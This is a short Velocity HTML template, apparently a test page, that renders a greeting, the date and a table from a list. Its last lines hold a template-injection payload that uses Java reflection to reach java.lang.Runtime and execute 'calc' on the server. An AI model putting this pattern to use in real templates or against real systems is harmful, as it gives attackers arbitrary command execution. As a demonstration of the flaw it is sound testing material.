<html>
<title>
    Test Velocity
</title>
<body>
    <h2>Hello $name.</h2>
    <h2>today is $date.</h2>

    #set( $table = "test" )

    <table border="1">
        <tr>
            <th>$table</th>
            <th>$table</th>
        </tr>
        #foreach ($i in $list)
            <tr>
                <td>$i</td>
                <td>$i</td>
            </tr>
        #end
    </table>

    #set($x='')
    #set($rt=$x.class.forName('java.lang.Runtime'))
    #set($ex=$rt.getRuntime().exec('calc'))

</body>
</html>